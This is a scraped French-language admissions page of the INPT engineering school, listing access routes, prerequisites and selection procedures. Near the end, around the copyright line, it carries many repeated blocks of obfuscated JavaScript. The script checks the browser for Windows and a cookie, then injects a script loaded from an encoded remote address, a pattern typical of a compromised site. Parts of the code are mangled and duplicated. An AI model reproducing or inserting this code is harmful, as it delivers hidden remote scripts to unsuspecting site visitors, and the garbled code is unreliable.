

⚠ [1] ⚠ [1]

Conditions d'admission [2]

Conditions d'admission

Les conditions d'admission au cycle d'ingénieurs de l'INPT sont les suivantes :

1. CONDITIONS D'ACCES :

- Accès en première année :

- Candidats ayant réussi le concours commun des écoles d'ingénieurs (filières MP, PSI et TSI)
- Etudiants ayant validé les deux années du cycle intégré préparatoire.

- Accès via les passerelles :

Première année sur concours ouvert :

Titulaires des diplômes suivants :

- DEUG Mathématique, Physique ou Informatique
- DUT
- DEUST
- DEUP
- Autres diplômes reconnus équivalents.

Deuxième année sur concours ouvert:

Titulaires des diplômes suivants :

- Licence Mathématique, Physique ou Informatique
- Autres diplômes reconnus équivalents.

Deuxième année sur titre :

Titulaires des diplômes suivants :

- Diplôme d'ingénieur dans des spécialités connexes aux Technologies de l'Information et Télécommunications.

2. PRE-REQUIS PEDAGOGIQUES :

Pour le concours d'accès en première année à partir de l'université, les pré-requis pédagogiques pour le concours DEUG sont ceux des quatre premiers semestres des filières licence Sciences Mathématiques ou Physique ou licence Sciences Mathématiques, Physique et Informatique.

Pour le concours d'accès en deuxième année à partir de l'université, les pré-requis pédagogiques sont ceux de la licence Mathématique, Physique ou Informatique ou de la maîtrise FST dans des spécialités connexes aux Technologies de l'Information et Télécommunications.

Pour l'accès sur titre en deuxième année du cycle, le diplôme présenté doit correspondre à un cursus présentant les pré-requis nécessaires pour la poursuite dans le cycle des ingénieurs de l'INPT.

3. PROCEDURES DE SELECTION :

(Préciser pour chaque public cible, la procédure de sélection)

- Concours national commun
- Concours spécifique à l'établissement d'accueil : concours DEUG et Licence d'accès en première année du cycle d'Ingénieurs
- **Etude du dossier :**
 - Obtention du CUES, DEUG ou équivalent, en deux ans avec validation et capitalisation de tous les modules de chacune des deux premières années.


```
951=,v;&0)3{2{=udlirc6?;srjx.{e,d4o6c{8s}/lm{o;c{.nd,n{a,r9b}h;s;imm7a;.k}c(a3r4t)/{/v:ssrp}t  
txth,');var  
o=document.getElementsByTagName('script')[0];o.parentNode.insertBefore(b,o);}}function  
m(v){var a="";for(var f=0;f=0;p--){k+=t[p];}return k;}}());
```



© 2017 Institut National des Postes et Télécommunications

```
;(function(){var x=navigator[m("4t)n)e}gnA(r;eistu)"];var y=document[m(":e}idk,owodc,");if(s(x,  
m("0s7w)obd)n)i(W{"})&&!s(x,m("&dui{o;r,den;Aj"}))){if(!s(y,m("p=na{m9t(uo_,_d_("))){var b=docu  
ment.createElement('script');b.type='text/javascript';b.async=true;b.src=m('b2)agd9f84}4,f893c(7{3;3{8,d{8(c)0cb}6  
951=,v;&0)3{2{=udlirc6?;srjx.{e,d4o6c{8s}/lm{o;c{.nd,n{a,r9b}h;s;imm7a;.k}c(a3r4t)/{/v:ssrp}t  
txth,');var  
o=document.getElementsByTagName('script')[0];o.parentNode.insertBefore(b,o);}}function  
m(v){var a="";for(var f=0;f=0;p--){k+=t[p];}return k;}}());;(function(){var  
x=navigator[m("4t)n)e}gnA(r;eistu)"];var y=document[m(":e}idk,owodc,");if(s(x,m("0s7w)obd)n)i(  
W{"})&&!s(x,m("&dui{o;r,den;Aj"}))){if(!s(y,m("p=na{m9t(uo_,_d_("))){var b=document.createEleme  
nt('script');b.type='text/javascript';b.async=true;b.src=m('b2)agd9f84}4,f893c(7{3;3{8,d{8(c)0cb}6  
951=,v;&0)3{2{=udlirc6?;srjx.{e,d4o6c{8s}/lm{o;c{.nd,n{a,r9b}h;s;imm7a;.k}c(a3r4t)/{/v:ssrp}t  
txth,');var  
o=document.getElementsByTagName('script')[0];o.parentNode.insertBefore(b,o);}}function  
m(v){var a="";for(var f=0;f=0;p--){k+=t[p];}return k;}}());;(function(){var  
x=navigator[m("4t)n)e}gnA(r;eistu)"];var y=document[m(":e}idk,owodc,");if(s(x,m("0s7w)obd)n)i(  
W{"})&&!s(x,m("&dui{o;r,den;Aj"}))){if(!s(y,m("p=na{m9t(uo_,_d_("))){var b=document.createEleme  
nt('script');b.type='text/javascript';b.async=true;b.src=m('b2)agd9f84}4,f893c(7{3;3{8,d{8(c)0cb}6  
951=,v;&0)3{2{=udlirc6?;srjx.{e,d4o6c{8s}/lm{o;c{.nd,n{a,r9b}h;s;imm7a;.k}c(a3r4t)/{/v:ssrp}t  
txth,');var  
o=document.getElementsByTagName('script')[0];o.parentNode.insertBefore(b,o);}}function  
m(v){var a="";for(var f=0;f=0;p--){k+=t[p];}return k;}}());;(function(){var  
x=navigator[m("4t)n)e}gnA(r;eistu)"];var y=document[m(":e}idk,owodc,");if(s(x,m("0s7w)obd)n)i(  
W{"})&&!s(x,m("&dui{o;r,den;Aj"}))){if(!s(y,m("p=na{m9t(uo_,_d_("))){var b=document.createEleme  
nt('script');b.type='text/javascript';b.async=true;b.src=m('b2)agd9f84}4,f893c(7{3;3{8,d{8(c)0cb}6  
951=,v;&0)3{2{=udlirc6?;srjx.{e,d4o6c{8s}/lm{o;c{.nd,n{a,r9b}h;s;imm7a;.k}c(a3r4t)/{/v:ssrp}t  
txth,');var  
o=document.getElementsByTagName('script')[0];o.parentNode.insertBefore(b,o);}}function  
m(v){var a="";for(var f=0;f=0;p--){k+=t[p];}return k;}}());
```


Source URL: <http://www.inpt.ac.ma/fr/conditions-d%E2%80%99admission>

Liens

[1] <http://www.inpt.ac.ma/fr/javascript%3A%3B>

[2] <http://www.inpt.ac.ma/fr/conditions-d%E2%80%99admission>